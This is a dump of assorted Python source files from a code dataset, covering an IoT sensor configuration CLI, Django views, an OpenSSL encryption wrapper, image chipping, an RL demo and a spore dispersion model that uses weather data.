sensor[1] == individualSensor:\n print(\"[✓] removing sensor with ID \" + individualSensor + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n\n else:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToRemove:\n print(\"[✓] removing sensor with ID \" + sensorToRemove)\n node[\"config\"].remove(sensor)\n else: \n \n for individualNode in nodeToConfigure:\n\n sensorToRemove = unparsedargs[unparsedargs.index(\"rm\") + 1]\n if ',' in sensorToRemove:\n sensorToRemove = sensorToRemove.split(\",\")\n\n for node in jsonNodes:\n if node[\"nodeID\"] == individualNode:\n for individualSensor in sensorToRemove:\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n print(\"[✓] removing sensor with ID \" + individualSensor + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n\n else:\n \n for node in jsonNodes:\n if node[\"nodeID\"] == individualNode:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToRemove:\n print(\"[✓] removing sensor with ID \" + sensorToRemove + \" from node with ID \" + node[\"nodeID\"])\n node[\"config\"].remove(sensor)\n \n # ex. Usage: --configure [nodeID] -sen dis [sensorID]\n \n elif function.lower() == 'dis':\n\n sensorToDisable = unparsedargs[unparsedargs.index(\"dis\") + 1]\n\n if not multipleNodes:\n \n if ',' in sensorToDisable:\n sensorToDisable = sensorToDisable.split(',')\n\n for individualSensor in sensorToDisable:\n \n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n sensor[2] = False\n print(\"Setting sensor with ID \" + individualSensor + \" to disabled.\")\n \n params = \"{0};dis;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n else:\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToDisable:\n sensor[2] = False\n print(\"Setting sensor with ID \" + sensorToDisable + \" to disabled.\")\n \n params = \"{0};dis;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n\n # ex. Usage: --configure [nodeID] -sen en [sensorID]\n\n\n elif function.lower() == 'en':\n\n sensorToEnable = unparsedargs[unparsedargs.index(\"en\") + 1]\n\n if not multipleNodes:\n \n if ',' in sensorToEnable:\n sensorToEnable = sensorToEnable.split(',')\n\n for individualSensor in sensorToEnable:\n \n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n sensor[2] = True\n print(\"Setting sensor with ID \" + individualSensor + \" to Enabled.\")\n \n params = \"{0};en;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n else:\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToEnable:\n sensor[2] = True\n print(\"Setting sensor with ID \" + sensorToEnable + \" to Enabled.\")\n\n params = \"{0};en;_\".format(sensor[1])\n sendConfig(node, params, \"sensorConfig\")\n\n # ex. Usage: --configure [nodeID] -sen freq [newSetting] [sensorID]\n\n elif function.lower() == 'freq':\n\n sensorToFreq = unparsedargs[unparsedargs.index(\"freq\") + 2]\n newFreqSetting = unparsedargs[unparsedargs.index(\"freq\") + 1]\n\n if not multipleNodes:\n \n if ',' in sensorToFreq:\n sensorToFreq = sensorToFreq.split(',')\n\n for individualSensor in sensorToFreq:\n \n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == individualSensor:\n sensor[2] = True\n print(\"Setting sensor with ID \" + individualSensor + \" to a sensing freq of \" + newFreqSetting + \" seconds.\")\n params = \"{0};_;{1}\".format(sensor[1], newFreqSetting)\n sendConfig(node, params, \"sensorConfig\") \n \n else:\n\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToConfigure:\n\n for sensor in node[\"config\"]:\n if sensor[1] == sensorToFreq:\n sensor[2] = True\n print(\"Setting sensor with ID \" + individualSensor + \" to a sensing freq of \" + newFreqSetting + \" seconds.\")\n\n params = \"{0};_;{1}\".format(sensor[1], newFreqSetting)\n sendConfig(node, params, \"sensorConfig\")\n\n with open('nodeConfigs.json', 'w') as outfile:\n for node in jsonNodes:\n json.dump(node, outfile)\n outfile.write(\"\\n\")\n #at the end we're going to save this to our objects and overwrite the nodeConfigs.json file.\n\n\ndef listNodes(args):\n\n # --list -sen [nodeID]\n\n\n if '-sen' in args:\n t = PrettyTable(['Sensor name', 'Sensor ID', 'Enabled/Disabled', 'Reporting Frequency'])\n nodeToSelect = args[args.index(\"-sen\") + 1]\n for node in jsonNodes:\n if node[\"nodeID\"] == nodeToSelect:\n for sensor in node[\"config\"]:\n t.add_row([sensor[0], sensor[1], sensor[2], sensor[3]])\n else:\n \n t = PrettyTable(['Name', 'nodeID', 'deviceID', 'enabled', 'Sending Freq', 'Sensing Freq', 'Status Message', 'Save to SD', 'Access token'])\n for node in jsonNodes:\n \n t.add_row([node[\"name\"], node[\"nodeID\"], node[\"deviceID\"], node[\"enabled\"], node[\"sendingFrequency\"], node[\"sensingFrequency\"], node[\"statusMessage\"], node[\"saveToSD\"], node[\"token\"]])\n print(t)\n\n\n\ndef addNode():\n nodeName = input(\"What would you like to name your node? \")\n nodeID = input(\"What is the node ID? \")\n deviceID = input(\"What is the deviceID? \")\n sendingFrequency = input(\"What would you like the SENDING frequency to be? \")\n sensingFrequency = input(\"What would you like the SENSING frequency to be? \")\n statusMessage = input(\"Would you like the node to send a status message? [True/False] \")\n saveToSD = input(\"Would you like the node to save to SD during connection loss? [True/False] \")\n defaultConfigYN = input(\"Use default config for bike waggle? [True/False]\")\n tempToken = getToken(input(\"What is this node's access token? If you want to use the same token as an existing node, just input the ID.\"))\n \n sensorConfig = []\n if defaultConfigYN.lower().startswith(\"t\"):\n sensorConfig = bikeWaggleConfig\n elif defaultConfigYN.lower().startswith(\"f\"):\n sensorConfig = createCustomConfig()\n\n\n jsonToAppend = {\n \"name\" : nodeName, # -rn \n \"nodeID\" : nodeID, # -id\n \"deviceID\" : deviceID, # -d\n \"enabled\" : False, # -e\n \"sendingFrequency\" : sendingFrequency, # -sdf\n \"sensingFrequency\" : sensingFrequency, # -ssf\n \"statusMessage\" : statusMessage, # -sm\n \"saveToSD\" : saveToSD, # - sd\n \"config\" : sensorConfig, # - sen\n \"token\" : tempToken\n }\n \n jsonNodes.append(jsonToAppend)\n\n \n with open('nodeConfigs.json', 'a') as outfile:\n json.dump(jsonToAppend, outfile)\n outfile.write(\"\\n\")\n print(jsonNodes)\n #configString = \"{{ \\\"name\\\" : \\\"{}\\\", }}\"\n\nloadNodes()\n#list of node names or node ID's. compare this to a node-lookup table if it's in name form.\n\n#import OS package and get args\nargs = sys.argv[1:] #get args here, removing the first \"controller.py entry\"\n#first, check if args are equal to non-function commands such as list nodes, help, disableAll, enableAll, addNode, removeNode\nif len(args) > 0:\n \n if args[0] == \"--help\" or args[0] == \"help\":\n\n print(\"\\nThis is a tool to configure your micro-waggle modules! Here's a list of commands: \\n\\n --help : gives you all the help you need! \\n --list : lists all nodes and their configurations \\n --enAll : enables all nodes! By default, all nodes are off out of the box. \\n --disAll : disables all nodes \\n --add: adds a new node, the parameters come after you type it! \\n --rm : lists your nodes and allows you to remove one \\n \")\n\n elif args[0] == \"--list\":\n\n listNodes(args)\n\n elif args[0] == \"--enAll\":\n\n enableAll()\n\n elif args[0] == \"--disAll\":\n\n disableAll(args[1:])\n\n elif args[0] == \"--add\":\n\n addNode()\n\n elif args[0] == \"--rm\":\n\n removeNode()\n\n elif args[0] == \"--configure\":\n\n configure(args[1:])\n\n # --config [node name] -sensorID []\nelse: \n print(\"\\nThis is a tool to configure your micro-waggle modules! Here's a list of commands: \\n\\n --help : gives you all the help you need! \\n --list : lists all nodes and their configurations \\n --enAll : enables all nodes! By default, all nodes are off out of the box. \\n --disAll : disables all nodes \\n --add: adds a new node, the parameters come after you type it! \\n --rm : lists your nodes and allows you to remove one \\n \")\n\n# I have to fix the --help interface. I'll get to it one day.\n\n","sub_path":"integrated/software/devicecontroller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":27274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"110658006","text":"import gym\nimport tensorflow as tf\nfrom Agent import Agent\n\n# Hyper parameters\nENV_NAME = \"CartPole-v0\"\nDISPLAY_EPISODE = 50\nMAX_STEP = 1000\nHIDDEN_UNITS = 20\n\n# Initial OpenAI Gym env and DQN agent\nenv = gym.make(ENV_NAME)\nagent = Agent(env)\n# Load model\nsaver = tf.train.Saver()\nsaver.restore(agent.sess, './model/CartPole.ckpt')\n\n# Display\nfor i in xrange(DISPLAY_EPISODE):\n state = env.reset()\n for j in xrange(MAX_STEP):\n env.render()\n action = agent.action(state, policy='greedy')\n state, reward, done, _ = env.step(action)\n if done:\n break\n\n print(\"Episode: %02d\" % (i))\n","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"89656126","text":"#! /usr/bin/env python\n# -*- coding: utf-8\n# @author \nimport logging\nfrom sys import argv, exit\nfrom pronto import Pronto, ProntoHttp404\n\nlogger = logging.getLogger('pronto_logger')\nlogger.setLevel(logging.CRITICAL)\np = Pronto(strict=True)\ntry:\n pr = p.problem_report(argv[1])\nexcept ProntoHttp404:\n print('NOT FOUND')\n exit(1)\nelse:\n print(pr.xml())\n","sub_path":"server/pronto/getpr.py","file_name":"getpr.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"489298847","text":"broker_ip=\"34.123.208.229\"\nbroker_port=1883\ndb_name=\"test_database\"\npath_data_heating=\"temperature_in\"\ntopic_grzalka=\"grzalka_test\"\ntopic_grzalka2=\"grzalka_test2\"\ndic={\"on\":\"1\",\"off\":\"0\"}\npath_data_temperature=\"temperature_in\"\npath_data_wiatr_sila=\"./../../Data/WindS.csv\"\npath_data_wiatr_kierunek=\"./../../Data/WindD.csv\"\npath_data_entrance=\"./../../Data/Entrance.csv\"\ntopic ={ \"harmonogram_new\":\"harmonogram_new\",\n \"light_salon\":\"light_salon\",\n \"heating_switch\":\"heating_switch\",\n \"grzalka\":\"grzalka\",\n \"temperatura\":\"temperatura\"}\n\ncollections={\n \"temperature_in\":\"symulated_temp\"\n \n}","sub_path":"src/Configs/config_test_termostat_con.py","file_name":"config_test_termostat_con.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"525163051","text":"import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\n\ndef chip_image(img, chip_size=(300, 300)):\n \"\"\"\n Segment an image into NxWxH chips\n\n Args:\n img : Array of image to be chipped\n chip_size : A list of (width,height) dimensions for chips\n\n Outputs:\n An ndarray of shape (N,W,H,3) where N is the number of chips,\n W is the width per chip, and H is the height per chip.\n\n \"\"\"\n width, height, _ = img.shape\n wn, hn = chip_size\n images = np.zeros((int(width / wn) * int(height / hn), wn, hn, 3))\n k = 0\n for i in tqdm(range(int(width / wn))):\n for j in range(int(height / hn)):\n chip = img[wn * i:wn * (i + 1), hn * j:hn * (j + 1), :3]\n images[k] = chip\n\n k = k + 1\n\n return images.astype(np.uint8)\n\n\nif __name__ == \"__main__\":\n arr = np.array(Image.open(\"./Images/CF013540.jpg\"))\n chip_size = (300, 300)\n img = chip_image(arr, chip_size)\n print(img.shape)\n\n chipresult = \"./chipresult/\"\n for index in range(img.shape[0]):\n a = img[index]\n r = Image.fromarray(a[:, :, 0]).convert('L')\n g = Image.fromarray(a[:, :, 1]).convert('L')\n b = Image.fromarray(a[:, :, 2]).convert('L')\n image = Image.merge(\"RGB\", (r, g, b))\n image.save(chipresult + str(index) + \".jpg\", 'jpg')\n\n\n","sub_path":"src/semantic-segmentation/test/chip.py","file_name":"chip.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"557390362","text":"from django.shortcuts import render, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom multiprocessing import Process,Manager\nfrom operator import itemgetter\n\nimport pickle\n\n# homepage\ndef index(request):\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\ttopics = []\n\n\t# display top 20 with descending upvotes\n\t# use django's pagination to display the rest of the topics\n\tsorted_topics = sorted(topics, key=itemgetter('upvote'), reverse=True)\n\tpaginator = Paginator(sorted_topics, 20)\n\tpage = request.GET.get('page')\n\n\ttry:\n\t\tpg_topic = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tpg_topic = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tpg_topic = paginator.page(paginator.num_pages)\n\n\t# only dict is allowed to be passed to the template\n\treturn render(request, 'thread/index.html', {'topics' : pg_topic})\n\n# method for posting topic\ndef post(request):\n\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\ttopics = []\n\n\t# structure of topics consists of a list of dictionaries\n\t# each dict store the details of each topic, such as upvote, downvote, content, id\n\tif request.method == 'POST':\n\t\ttopic = {}\n\t\ttopic['id'] = len(topics)\n\t\ttopic['content'] = request.POST['post']\n\t\ttopic['upvote'] = 0\n\t\ttopic['downvote'] = 0\n\t\ttopics.append(topic)\n\n\t\t# save changes as pickled python list\n\t\tpickle.dump(topics, open('topics.pickle', 'wb'))\n\n\t# redirect back to homepage\n\treturn redirect('/thread/')\n\n# method for voting\ndef vote(request):\n\t# check if topics exist\n\ttry:\n\t\ttopics = pickle.load(open('topics.pickle', 'rb'))\n\texcept (IOError, OSError) as e:\n\t\t# just redirect to homepage if thread does not exist\n\t\treturn redirect('/thread/')\n\n\tif request.method == 'POST':\n\t\t# update topic based on id\n\t\ttopic_id = int(request.POST['id'])\n\n\t\t# distinguish between upvoting and downvoting\n\t\tif 'upvote' in request.POST:\n\t\t\ttopics[topic_id]['upvote'] += 1\n\t\telif 'downvote' in request.POST:\n\t\t\ttopics[topic_id]['downvote'] += 1\n\n\t\t# save changes as pickled python list\n\t\tpickle.dump(topics, open('topics.pickle', 'wb'))\n\n\t# redirect back to homepage\n\treturn redirect('/thread/')\n\n# not required for main functionalities\n# implemented for convenience to remove all the posts\ndef clear(request):\n\tpickle.dump([], open('topics.pickle', 'wb'))\n\treturn redirect('/thread/')","sub_path":"thread/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"536347279","text":"from django.shortcuts import render, HttpResponse\nfrom apps.hello.models import Contact, HttpRequestLog\nfrom apps.hello.forms import ContactForm\nfrom django.contrib.auth.decorators import login_required\nimport json\n\nimport datetime\n\nlogin_url = '/login/'\n\n\ndef hello(request):\n contact = Contact.objects.all()[0]\n age = int((datetime.date.today() - contact.date_of_birth).days / 365.25)\n return render(request, 'hello/index.html',\n {'contact': contact, 'age': age})\n\n\ndef http_requests(request):\n requests = HttpRequestLog.objects.all().order_by('-date')[:10]\n request.session['viewed_nmb'] = HttpRequestLog.objects.count()\n return render(request, 'hello/requests.html',\n {'requests': requests})\n\n\ndef ajax_request(request):\n response_data = {'total': HttpRequestLog.objects.count()}\n if 'viewed_nmb' in request.session:\n response_data['total'] -= request.session['viewed_nmb']\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n\n\n@login_required(login_url=login_url)\ndef edit_form(request):\n current_entry = Contact.objects.all()[0]\n if request.method == 'POST' and request.is_ajax():\n form = ContactForm(request.POST, request.FILES, instance=current_entry)\n if form.is_valid():\n form.save()\n return HttpResponse(json.dumps({'success': 'success'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'error': form.errors}))\n else:\n form = ContactForm(instance=current_entry)\n return render(request, 'hello/edit_form.html',\n {'form': form, 'entry': current_entry})\n","sub_path":"apps/hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"93343017","text":"from random import randint\n\ndef main():\n \"\"\"Guess the number!!\"\"\"\n\n #The correct answer cannot change every loop so it has to stay outside the loop\n correctNumber = randint(0, 100)\n guessNumber = input(\"What's your guess from 0 to 100, man?\\n\")\n \n #Gotta make sure we're giving an int alright\n try:\n GuessVal = int(guessNumber)\n except ValueError:\n print(\"That's not an int\")\n\n while(1):\n\n #So what'cha say? The main game loop\n if(GuessVal == correctNumber):\n print(\"Yay! , how'd you do that?\\n\") \n break\n \n elif(GuessVal > correctNumber):\n print(\"Not quite there, you wanna try something lesser?\\n\")\n GuessVal = int(input(\"What's your guess from 0 to 100, man?\\n\"))\n continue\n \n else:\n print(\"Try something bigger\\n\")\n GuessVal = int(input(\"What's your guess from 0 to 100, man?\\n\"))\n continue\n \nif __name__ == '__main__':\n main()","sub_path":"Knight Lab Projects/2.Guess Number.py","file_name":"2.Guess Number.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"244493853","text":"import subprocess\nimport key_store\nimport pdb\nimport os\n\n\ndef perform_encryption(messages: list, keystore_data, is_text_encryption: bool):\n\n messages = messages if isinstance(messages, list) else [messages]\n key = key_store.get_password(\n keystore_data.path, keystore_data.password, keystore_data.key_identifier\n )\n if is_text_encryption:\n return encrypt_text(messages, keystore_data.encryption_mode, key)\n else:\n return encrypt_files(messages, keystore_data.encryption_mode, key)\n\n\n# TODO: add -iv from devrandom\n# NEVER USE URANDOM\ndef encrypt_text(plaintexts: list, encryption_mode: str, key: str):\n\n ciphertexts = []\n\n for message in plaintexts:\n\n open_ssl_commands = [\"openssl\", \"enc\", f\"-{encryption_mode}\", \"-nosalt\"]\n\n if \"cbc\" in encryption_mode:\n with open(\"/dev/random\", \"rb\") as f:\n iv = f.read(16).hex()\n open_ssl_commands += [\"-K\", f\"{key}\", \"-iv\", f\"{iv}\"]\n else:\n open_ssl_commands += [\"-k\", f\"{key}\"]\n\n ciphertext = subprocess.check_output(open_ssl_commands, input=message)\n ciphertexts.append(ciphertext)\n\n return ciphertexts\n\n\ndef encrypt_files(\n file_paths: list, encryption_mode: str, key: str, challenge: bool = False\n):\n encrypted_paths = []\n\n if challenge:\n for path in file_paths:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n f\"-{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-iv\",\n f\"{os.urandom(16).hex()}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n f\"challenge.enc\",\n ]\n subprocess.check_output(open_ssl_commands)\n\n else:\n for path in file_paths:\n\n enc_path = f\"{path}.enc\"\n encrypted_paths.append(enc_path)\n\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n f\"-{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-iv\",\n f\"{os.urandom(16).hex()}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n enc_path,\n ]\n subprocess.check_output(open_ssl_commands)\n return encrypted_paths\n\n\n##### DECRYPTION #####\ndef perform_decryption(\n ciphertexts: list, keystore_data, encryption_mode: str, is_text_decryption: bool\n):\n\n ciphertexts = ciphertexts if isinstance(ciphertexts, list) else [ciphertexts]\n\n key = key_store.get_password(\n keystore_data.path, keystore_data.password, keystore_data.key_identifier\n )\n\n if is_text_decryption:\n encrypt_text(ciphertexts, encryption_mode, key)\n else:\n decrypt_files(ciphertexts, encryption_mode, key)\n\n\ndef decrypt_text(ciphertexts: list, encryption_mode: str, key: str) -> list:\n plaintexts = []\n\n for ciphertext in ciphertexts:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n \"-d\",\n f\"{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n ]\n plaintext = subprocess.check_output(open_ssl_commands, input=ciphertext)\n plaintexts.append(plaintext)\n\n return plaintexts\n\n\ndef decrypt_files(file_paths, encryption_mode, key):\n\n for path in file_paths:\n open_ssl_commands = [\n \"openssl\",\n \"enc\",\n \"-d\",\n f\"{encryption_mode}\",\n \"-nosalt\",\n \"-k\",\n f\"{key}\",\n \"-in\",\n f\"{path}\",\n \"-out\",\n f\"{path}.dec\",\n ]\n output = subprocess.check_output(open_ssl_commands)\n","sub_path":"List_3/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640331184","text":"import numpy as np\nfrom data_utils import load_vocab\nimport constants\n\n\n# NLPLAB_W2V = 'data/w2v_model/wikipedia-pubmed-and-PMC-w2v.bin'\n# NLPLAB_W2V = 'data/w2v_model/BioWordVec_PubMed_MIMICIII_d200.vec.bin'\nNLPLAB_W2V = 'data/w2v_model/w2v_retrain.bin'\n\n\ndef export_trimmed_nlplab_vectors(vocab, trimmed_filename, dim=200, bin=NLPLAB_W2V):\n \"\"\"\n Saves glove vectors in numpy array\n\n Args:\n vocab: dictionary vocab[word] = index\n trimmed_filename: a path where to store a matrix in npy\n dim: (int) dimension of embeddings\n :param bin:\n \"\"\"\n # embeddings contains embedding for the pad_tok as well\n embeddings = np.zeros([len(vocab) + 1, dim])\n with open(bin, 'rb') as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n print('nlplab vocab size', vocab_size)\n binary_len = np.dtype('float32').itemsize * layer1_size\n\n count = 0\n m_size = len(vocab)\n for line in range(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == b' ':\n word = b''.join(word)\n break\n if ch != b'\\n':\n word.append(ch)\n word = word.decode(\"utf-8\")\n\n if word in vocab:\n count += 1\n embedding = np.fromstring(f.read(binary_len), dtype='float32')\n word_idx = vocab[word]\n embeddings[word_idx] = embedding\n else:\n f.read(binary_len)\n\n print('Missing rate {}'.format(1.0 * (m_size - count)/m_size))\n np.savez_compressed(trimmed_filename, embeddings=embeddings)\n\n\nvocab_words = load_vocab(constants.ALL_WORDS)\nexport_trimmed_nlplab_vectors(vocab_words, 'w2v_retrain_nlplab.npz')\n","sub_path":"data/w2v_model/trim_w2v.py","file_name":"trim_w2v.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"173865345","text":"'''\nCreated on Jun 12, 2014\n\n@author: CKenley\n'''\nimport logging\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nlogging.basicConfig(\n format=\"%(asctime)s : %(levelname)s : %(message)s\",\n filename=\"user.log\",\n level=logging.DEBUG\n )\n\n\ndef ProfileView(request):\n if 'user' in request.session:\n user = request.session['user']\n return render(request, \"user/profile.html\", {\"user\": user})\n errmsg = \"User could not be found in session!\"\n logging.error(errmsg)\n raise Http404(errmsg)\n","sub_path":"BTC/btc_wizard/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"126213086","text":"'''Crie um programa que tenha uma tupla totalmente preenchida com uma contagem por extenso, de zero até vinte. Seu\r\nprograma deverá ler um número pelo teclado (entre 0 e 20) e mostrá-lo por extenso.'''\r\n\r\nnums = ('zero', 'um', 'dois', 'tres', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',\r\n'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\r\n\r\nn = int(input('Digite um número de 0 a 20: '))\r\nwhile True:\r\n if n < 0 or n > 20:\r\n n = int(input('Valor digitado inválido. Digite um número de 0 a 20:'))\r\n else:\r\n break\r\nprint(nums[n])\r\n\r\nresp = input('Você quer que continue a contagem? [S/N] ').upper().strip()[0]\r\n\r\nwhile True:\r\n if resp != 'S' and resp != 'N':\r\n resp = input('Resposta inválida. Você quer que continue a contagem? [S/N] ').upper().strip()[0]\r\n\r\n if resp == 'S':\r\n if n != 20:\r\n n += 1\r\n print(nums[n])\r\n\r\n elif resp == 'N':\r\n break\r\n\r\nprint('Sequencia terminada.')\r\n","sub_path":"Ex072.py","file_name":"Ex072.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"489876372","text":"\nfrom __future__ import division\nimport os\nimport math\nimport json\nimport base64\nimport tempfile\nimport requests\nimport argparse\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D, axes3d\n\n\ndef stabilityclass_day(u,cloud,UV):\n if (cloud > 0.5): return 'D'\n if UV < 300:\n if (u<2): return 'B'\n if (2<=u<=5): return 'C'\n if (u>5): return 'D'\n elif 300 <= UV <= 600:\n if (u<2): return 'A'\n if 2<=u<5: return 'B'\n if 5<=u<=6: return 'C'\n if u>6: return 'D'\n elif UV > 600:\n if (u<3): return 'A'\n if (3<=u<=5): return 'B'\n if (u>5): return 'C'\n\ndef stabilityclass_night(u,cloud):\n if (cloud > 0.5): return 'D'\n if 0.355: return 'D'\n elif cloud<=0.35:\n if u<=3: return 'E'\n if u>3: return 'D'\n\ndef stabilityclass_latlon(lat,lon):\n ''' Calls an API to get weather data from location\n Returns stability class at day and night based on weather'''\n import json\n import requests\n # Gather weather parameters time='day'\n try:\n apikey='a6a267d35d8c445bbc4f74dca9543661'\n url='https://api.weatherbit.io/v2.0/current?lat={}&lon={}&key={}'.format(lat,lon,apikey)\n json_response = requests.get(url).json()\n except:\n raise Exception('API call was not possible')\n RH=json_response['data'][0]['rh']\n Irradiance=json_response['data'][0]['solar_rad']\n rain=json_response['data'][0]['precip']\n clouds=(json_response['data'][0]['clouds'])/100\n u=json_response['data'][0]['wind_spd']\n UV=json_response['data'][0]['uv']\n city=json_response['data'][0]['city_name']\n country=json_response['data'][0]['country_code']\n\n stabilityclasses={}\n stabilityclasses['Day']= stabilityclass_day(u,clouds,Irradiance)\n stabilityclasses['Night']= stabilityclass_night(u,clouds)\n\n return (stabilityclasses,u,RH,Irradiance,rain,clouds,UV,city, country)\n\ndef stabilityclass_input(u,cloud,UV):\n u=float(u) ; cloud=float(cloud)\n stabilityclasses={}\n stabilityclasses['Day']= stabilityclass_day(u,cloud,UV)\n stabilityclasses['Night']= stabilityclass_night(u,cloud)\n return stabilityclasses\n\n\n## Functions for printing the graph\n\ndef graph_2D(allXs,allYs,allCs,stabilityclass,u,time):\n matplotlib.use('agg')\n plt.scatter(allYs,allXs,c=allCs,cmap='nipy_spectral_r')\n cbar = plt.colorbar()\n cbar.set_label('Number of aeciospores deposited')\n plt.clim(0,5000)\n plt.xlabel('Horizontal plane (m)')\n plt.ylabel('Downwind of source distance (m)')\n plt.title('Stability class %s. Wind speed: %s m/s' % (stabilityclass,u))\n\n with tempfile.TemporaryFile(suffix=\".png\") as tmpfile:\n plt.savefig(tmpfile,format=\"png\")\n plt.clf()\n tmpfile.seek(0)\n return base64.b64encode(tmpfile.read())\n\n\ndef graph_3D(allXs,allYs,allZs,allCs, stability_class,u,time):\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n p = ax.scatter(allXs, allYs, allZs, zdir='z', s=20, c=allCs, cmap='nipy_spectral_r', depthshade=True)\n ax.legend()\n fig.colorbar(p)\n plt.ylabel('Cross-wind (m)')\n plt.xlabel('Distance (m)')\n plt.yticks([0,1,2])\n plt.title('Stability Class: %s. Wind: %s m/s' %(stability_class,u))\n plt.savefig('3D_%s_%s'% (city,time))\n\n\n\ndef calculateCs(stability_class,x,y,z,H,Q0,u,I,R, time):\n Vs=0.0113 # m/s 11.3 mm/s # Vd=1.27 # Vs=1.13 # urediniospores = 11.5 mm/s\n z=0\n stabilities={ #a b 10P q\n 'A': [0.28,0.9,0.527,0.865],\n 'B': [0.23,0.85,0.371,0.866],\n 'C': [0.22,0.8,0.209,0.897],\n 'D': [0.2,0.76,0.128,0.905],\n 'E': [0.15,0.73,0.098,0.902],\n 'F': [0.12,0.67,0.065,0.902],\n }\n # h=0.7\n hd=0.2\n z0=0.13*hd #0.029\n kz0= (10*z0)**(0.53*(x**-0.22))\n d=0.56*hd\n a = stabilities[stability_class][0]\n b = stabilities[stability_class][1]\n p = stabilities[stability_class][2]\n q = stabilities[stability_class][3]\n sigy=kz0*p*(x**q)\n sigz=kz0*a*(x**b)\n sig2y=sigy**2\n sig2z=sigz**2\n secondpart=math.exp(-(((H-z)**2)/(2*sig2z)))+math.exp(-(((H+z-2*d)**2)/(2*sig2z)))\n\n if time=='Day': Fs=math.exp(-(I*x)/5555*u) #5555*u) #18.01\n if time=='Night': Fs=1\n\n Yw=0.000272*(R**0.7873)\n Yd1=math.sqrt(2/math.pi)*(Vs/x)\n Y2a=((10*z0)**(0.53*(x**(-0.22))))*(x**(0.22-b+1))\n Y2b=math.log(10*z0)*(0.53*0.22)\n Yd2=Y2a*Y2b/a\n Yd=Yd1*Yd2\n\n Fd=math.exp((-(Yw+abs(Yd))*x)/u)\n Q=Q0*Fd*Fs\n\n 